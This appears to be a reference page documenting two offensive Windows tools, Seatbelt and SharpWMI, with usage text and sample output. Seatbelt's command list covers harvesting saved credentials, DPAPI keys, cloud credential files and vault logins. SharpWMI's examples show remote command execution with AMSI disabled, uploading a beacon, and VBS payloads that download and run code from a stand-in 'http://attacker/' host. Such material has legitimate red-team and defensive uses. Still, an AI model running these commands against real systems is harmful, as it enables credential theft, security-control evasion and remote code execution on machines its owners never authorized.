seatbelt

Description

Seatbelt is a C# project that performs a number of security-oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.

Platform: Windows
Author: @harmj0y and @tifkin_ are the primary authors
License: 3-Clause BSD
URL: https://github.com/GhostPack/Seatbelt

Usage

                        %&&@@@&&
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*
                        &%%&&&%%%%%        v1.0.0         ,(((&%%%%%%%%%%%%%%%%%,
                         #%%%%##,
 
 
Available commands (+ means remote usage is supported):
 
    + AMSIProviders          - Providers registered for AMSI
    + AntiVirus              - Registered antivirus (via WMI)
      AppLocker              - AppLocker settings, if installed
      ARPTable               - Lists the current ARP table and adapter information (equivalent to arp -a)
      AuditPolicies          - Enumerates classic and advanced audit policy settings
    + AuditPolicyRegistry    - Audit settings via the registry
    + AutoRuns               - Auto run executables/scripts/programs
      ChromeBookmarks        - Parses any found Chrome bookmark files
      ChromeHistory          - Parses any found Chrome history files
      ChromePresence         - Checks if interesting Google Chrome files exist
      CloudCredentials       - AWS/Google/Azure cloud credential files
      CredEnum               - Enumerates the current user's saved credentials using CredEnumerate()
      CredGuard              - CredentialGuard configuration
      dir                    - Lists files/folders. By default, lists users' downloads, documents, and desktop folders (arguments == [directory] [depth] [regex] [boolIgnoreErrors]
    + DNSCache               - DNS cache entries (via WMI)
    + DotNet                 - DotNet versions
      DpapiMasterKeys        - List DPAPI master keys
      EnvironmentPath        - Current environment %PATH$ folders and SDDL information
      EnvironmentVariables   - Current user environment variables
      ExplicitLogonEvents    - Explicit Logon events (Event ID 4648) from the security event log. Default of 7 days, argument == last X days.
      ExplorerMRUs           - Explorer most recently used files (last 7 days, argument == last X days)
    + ExplorerRunCommands    - Recent Explorer "run" commands
      FileInfo               - Information about a file (version information, timestamps, basic PE info, etc. argument(s) == file path(s)
      FirefoxHistory         - Parses any found FireFox history files
      FirefoxPresence        - Checks if interesting Firefox files exist
    + Hotfixes               - Installed hotfixes (via WMI)
      IdleTime               - Returns the number of seconds since the current user's last input.
      IEFavorites            - Internet Explorer favorites
      IETabs                 - Open Internet Explorer tabs
      IEUrls                 - Internet Explorer typed URLs (last 7 days, argument == last X days)
      InstalledProducts      - Installed products via the registry
      InterestingFiles       - "Interesting" files matching various patterns in the user's folder. Note: takes non-trivial time.
    + InterestingProcesses   - "Interesting" processes - defensive products and admin tools
      InternetSettings       - Internet settings including proxy configs and zones configuration
    + LAPS                   - LAPS settings, if installed
    + LastShutdown           - Returns the DateTime of the last system shutdown (via the registry).
      LocalGPOs              - Local Group Policy settings applied to the machine/local users
    + LocalGroups            - Non-empty local groups, "-full" displays all groups (argument == computername to enumerate)
    + LocalUsers             - Local users, whether they're active/disabled, and pwd last set (argument == computername to enumerate)
      LogonEvents            - Logon events (Event ID 4624) from the security event log. Default of 10 days, argument == last X days.
    + LogonSessions          - Windows logon sessions
    + LSASettings            - LSA settings (including auth packages)
    + MappedDrives           - Users' mapped drives (via WMI)
      MicrosoftUpdates       - All Microsoft updates.
      NamedPipes             - Named pipe names and any readable ACL information.
    + NetworkProfiles        - Windows network profiles
    + NetworkShares          - Network shares exposed by the machine (via WMI)
    + NTLMSettings           - NTLM authentication settings
      OfficeMRUs             - Office most recently used file list (last 7 days)
      OSInfo                 - Basic OS info (i.e. architecture, OS version, etc.)
      OutlookDownloads       - List files downloaded by Outlook
      PoweredOnEvents        - Reboot and sleep schedule based on the System event log EIDs 1, 12, 13, 42, and 6008. Default of 7 days, argument == last X days.
    + PowerShell             - PowerShell versions and security settings
      PowerShellEvents       - PowerShell script block logs (4104) with sensitive data.
      Printers               - Installed Printers (via WMI)
      ProcessCreationEvents  - Process creation logs (4688) with sensitive data.
      Processes              - Running processes with file info company names that don't contain 'Microsoft', "-full" enumerates all processes
    + ProcessOwners          - Running non-session 0 process list with owners. For remote use.
    + PSSessionSettings      - Enumerates PS Session Settings from the registry
    + PuttyHostKeys          - Saved Putty SSH host keys
    + PuttySessions          - Saved Putty configuration (interesting fields) and SSH host keys
      RDCManFiles            - Windows Remote Desktop Connection Manager settings files
    + RDPSavedConnections    - Saved RDP connections stored in the registry
    + RDPSessions            - Current incoming RDP sessions (argument == computername to enumerate)
      RecycleBin             - Items in the Recycle Bin deleted in the last 30 days - only works from a user context!
      reg                    - Registry key values (HKLM\Software by default) argument == [Path] [intDepth] [Regex] [boolIgnoreErrors]
      RPCMappedEndpoints     - Current RPC endpoints mapped
    + SCCM                   - System Center Configuration Manager (SCCM) settings, if applicable
    + ScheduledTasks         - Scheduled tasks (via WMI) that aren't authored by 'Microsoft', "-full" dumps all Scheduled tasks
      SearchIndex            - Query results from the Windows Search Index, default term of 'passsword'. (argument(s) == <search path> <pattern1,pattern2,...>
      SecurityPackages       - Enumerates the security packages currently available using EnumerateSecurityPackagesA()
      Services               - Services with file info company names that don't contain 'Microsoft', "-full" dumps all processes
      SlackDownloads         - Parses any found 'slack-downloads' files
      SlackPresence          - Checks if interesting Slack files exist
      SlackWorkspaces        - Parses any found 'slack-workspaces' files
    + Sysmon                 - Sysmon configuration from the registry
      SysmonEvents           - Sysmon process creation logs (1) with sensitive data.
      TcpConnections         - Current TCP connections and their associated processes and services
      TokenGroups            - The current token's local and domain groups
      TokenPrivileges        - Currently enabled token privileges (e.g. SeDebugPrivilege/etc.)
    + UAC                    - UAC system policies via the registry
      UdpConnections         - Current UDP connections and associated processes and services
      UserRightAssignments   - Configured User Right Assignments (e.g. SeDenyNetworkLogonRight, SeShutdownPrivilege, etc.) argument == computername to enumerate
    + WindowsAutoLogon       - Registry autologon information
      WindowsCredentialFiles - Windows credential DPAPI blobs
    + WindowsDefender        - Windows Defender settings (including exclusion locations)
    + WindowsEventForwarding - Windows Event Forwarding (WEF) settings via the registry
    + WindowsFirewall        - Non-standard firewall rules, "-full" dumps all (arguments == allow/deny/tcp/udp/in/out/domain/private/public)
      WindowsVault           - Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
      WMIEventConsumer       - Lists WMI Event Consumers
      WMIEventFilter         - Lists WMI Event Filters
      WMIFilterBinding       - Lists WMI Filter to Consumer Bindings
    + WSUS                   - Windows Server Update Services (WSUS) settings, if applicable
 
 
Seatbelt has the following command groups: All, User, System, Slack, Chrome, Remote, Misc
 
    You can invoke command groups with "Seatbelt.exe <group>"
 
   "Seatbelt.exe -group=all" runs all commands
 
   "Seatbelt.exe -group=user" runs the following commands:
 
        ChromePresence, CloudCredentials, CredEnum, dir, DpapiMasterKeys,
        ExplorerMRUs, ExplorerRunCommands, FirefoxPresence, IdleTime,
        IEFavorites, IETabs, IEUrls, MappedDrives,
        OfficeMRUs, PuttyHostKeys, PuttySessions, RDCManFiles,
        RDPSavedConnections, SlackDownloads, SlackPresence, SlackWorkspaces,
        TokenGroups, WindowsCredentialFiles, WindowsVault
 
   "Seatbelt.exe -group=system" runs the following commands:
 
        AMSIProviders, AntiVirus, AppLocker, ARPTable, AuditPolicies,
        AuditPolicyRegistry, AutoRuns, CredGuard, DNSCache,
        DotNet, EnvironmentPath, EnvironmentVariables, Hotfixes,
        InterestingProcesses, InternetSettings, LAPS, LastShutdown,
        LocalGPOs, LocalGroups, LocalUsers, LogonSessions,
        LSASettings, NamedPipes, NetworkProfiles, NetworkShares,
        NTLMSettings, OSInfo, PoweredOnEvents, PowerShell,
        Printers, Processes, PSSessionSettings, RDPSessions,
        SCCM, Services, Sysmon, TcpConnections,
        TokenPrivileges, UAC, UdpConnections, UserRightAssignments,
        WindowsAutoLogon, WindowsDefender, WindowsEventForwarding, WindowsFirewall,
        WMIEventConsumer, WMIEventFilter, WMIFilterBinding, WSUS
 
 
   "Seatbelt.exe -group=slack" runs the following commands:
 
        SlackDownloads, SlackPresence, SlackWorkspaces
 
   "Seatbelt.exe -group=chrome" runs the following commands:
 
        ChromeBookmarks, ChromeHistory, ChromePresence
 
   "Seatbelt.exe -group=remote" runs the following commands:
 
        AMSIProviders, AntiVirus, DotNet, ExplorerRunCommands, Hotfixes,
        InterestingProcesses, LastShutdown, LogonSessions, LSASettings,
        MappedDrives, NetworkProfiles, NetworkShares, NTLMSettings,
        PowerShell, ProcessOwners, PuttyHostKeys, PuttySessions,
        RDPSavedConnections, RDPSessions, Sysmon, WindowsDefender,
        WindowsEventForwarding, WindowsFirewall
 
   "Seatbelt.exe -group=misc" runs the following commands:
 
        ChromeBookmarks, ChromeHistory, ExplicitLogonEvents, FileInfo, FirefoxHistory,
        InstalledProducts, InterestingFiles, LogonEvents, MicrosoftUpdates,
        OutlookDownloads, PowerShellEvents, ProcessCreationEvents, ProcessOwners,
        RecycleBin, reg, RPCMappedEndpoints, ScheduledTasks,
        SearchIndex, SecurityPackages, SysmonEvents

Examples

 seatbelt -q AntiVirus

This checks for registered antivirus products on the host.

C:\Tools>seatbelt -q AntiVirus
====== AntiVirus ======
 
  Engine                         : Windows Defender
  ProductEXE                     : windowsdefender://
  ReportingEXE                   : %ProgramFiles%\Windows Defender\MsMpeng.exe

seatbelt -q InstalledProducts

This will query WMI for installed software on the system.

C:\Tools>seatbelt -q InstalledProducts
====== InstalledProducts ======
 
  DisplayName                    : BleachBit 4.4.2.2142
  DisplayVersion                 : 4.4.2.2142
  Publisher                      : BleachBit
  InstallDate                    : 1/13/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Google Chrome
  DisplayVersion                 : 99.0.4844.74
  Publisher                      : Google LLC
  InstallDate                    : 3/15/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Icecast v2.0.0
  DisplayVersion                 :
  Publisher                      :
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Edge
  DisplayVersion                 : 99.0.1150.39
  Publisher                      : Microsoft Corporation
  InstallDate                    : 3/14/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Edge Update
  DisplayVersion                 : 1.3.155.85
  Publisher                      :
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Npcap
  DisplayVersion                 : 1.10
  Publisher                      : Nmap Project
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Wireshark 3.4.4 64-bit
  DisplayVersion                 : 3.4.4
  Publisher                      : The Wireshark developer community, https://www.wireshark.org
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
  DisplayVersion                 : 12.0.30501.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
...
  DisplayName                    : Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
  DisplayVersion                 : 14.28.29910
  Publisher                      : Microsoft Corporation
  InstallDate                    : 4/8/2021 12:00:00 AM
  Architecture                   : x64
 
  DisplayName                    : Java(TM) SE Development Kit 15 (64-bit)
  DisplayVersion                 : 15.0.0.0
  Publisher                      : Oracle Corporation
  InstallDate                    : 9/26/2020 12:00:00 AM
  Architecture                   : x64

seatbelt.exe -q <command> -computername=x.x.x.x -username=<domain>\<user> -password=<password>

This runs a command against a remote host over RPC, authenticating with the supplied credentials.


SharpWMI

Description

A C# implementation of various WMI functionality.

This implementation is a refurbished and enhanced version of original SharpWMI by @harmj0y that adds some more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI and makes it possible to return output from WMI remotely executed commands.

Platform: Windows
Author: Will Schroeder
License: 3-Clause BSD
URL: https://github.com/GhostPack/SharpWMI

Usage

USAGE:
  Local system enumeration:       
    SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
 
  Remote system enumeration:
    SharpWMI.exe action=query [computername=HOST1[,HOST2,...]] query="select * from win32_service" [namespace=BLAH]
 
  Remote system Logged On users enumeration:
    SharpWMI.exe action=loggedon [computername=HOST1[,HOST2,...]]
 
  Remote process creation:
    SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="C:\\temp\\process.exe [args]" [amsi=disable] [result=true]
 
  Remote VBS execution:
    SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
 
  File upload via WMI:
    SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source="C:\\source\\file.exe" dest="C:\\temp\\dest-file.exe" [amsi=disable]
 
  Remote firewall enumeration :
    SharpWMI.exe action=firewall computername=HOST1[,HOST2,...]
 
  List processes:
    SharpWMI.exe action=ps [computername=HOST[,HOST2,...]]
 
  Terminate process (first found):
    SharpWMI.exe action=terminate process=PID|name [computername=HOST[,HOST2,...]]
 
  Get environment variables (all if name not given):
    SharpWMI.exe action=getenv [name=VariableName] [computername=HOST[,HOST2,...]]
 
  Set environment variable:
    SharpWMI.exe action=setenv name=VariableName value=VariableValue [computername=HOST[,HOST2,...]]
 
  Delete an environment variable:
    SharpWMI.exe action=delenv name=VariableName [computername=HOST[,HOST2,...]]
 
  Install MSI file:
    SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path="C:\\temp\\installer.msi" [amsi=disable]
 
NOTE:
  - Any remote function also takes an optional "username=DOMAIN\\user" "password=Password123!".
  - If computername is not specified, will target localhost.
 
VBS Script execution:
  The 'executevbs' action was reworked as compared to the original version of SharpWMI.
  Script specification defined in [script-specification] offers following methods to point this tool at target VBS code:
 
  A) Executes OS command via preset VBS code:
    SharpWMI.exe action=executevbs [...] command="notepad.exe"
 
  B) Downloads Powershell commands from URL and execute them from within VBS via Powershell's StdIn:
    SharpWMI.exe action=executevbs [...] url="http://attacker/myscript.ps1"
 
  C) Download a binary file from given URL, store it in specified path and then execute it:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe"
 
  D) Download a binary file from given URL, store it in specified path and then execute arbitrary command:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe" command="%TEMP%\bar.exe -some -parameters"
 
  E) Read VBS script from file and execute it:
    SharpWMI.exe action=executevbs [...] script="myscript.vbs"
 
  F) Execute given VBS script given literally:
    SharpWMI.exe action=executevbs [...] script="CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\")"
 
  G) Base64 decode input string being encoded VBS script and execute it on remote machine:
    SharpWMI.exe action=executevbs [...] scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIi[...]"
 
  H) Read contents of given file, base64 decode them and then execute on target machine:
    SharpWMI.exe action=executevbs [...] scriptb64="myscript.vbs.b64"
 
  Finally, 'executevbs' action may have additional [time-specs] defined in seconds - they specify script trigger and wait timeouts:
    SharpWMI.exe action=executevbs [...] trigger=5 timeout=10
 
 
EXAMPLES:
 
  SharpWMI.exe action=query query="select * from win32_process"
 
  SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\\SecurityCenter2"
 
  SharpWMI.exe action=loggedon computername=primary.testlab.local
 
  SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
 
  SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process"
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="whoami" result=true amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local command="notepad.exe" eventname="MyLittleEvent" amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local username="TESTLAB\\harmj0y" password="Password123!"
 
  SharpWMI.exe action=upload computername=primary.testlab.local source="beacon.exe" dest="C:\\Windows\\temp\\foo.exe" amsi=disable
 
  SharpWMI.exe action=terminate computername=primary.testlab.local process=explorer
 
  SharpWMI.exe action=getenv name=PATH computername=primary.testlab.local
 
  SharpWMI.exe action=setenv name=FOO value="BAR" computername=primary.testlab.local
 
  SharpWMI.exe action=delenv name=FOO computername=primary.testlab.local
 
  SharpWMI.exe action=install computername=primary.testlab.local path="C:\\temp\\installer.msi"
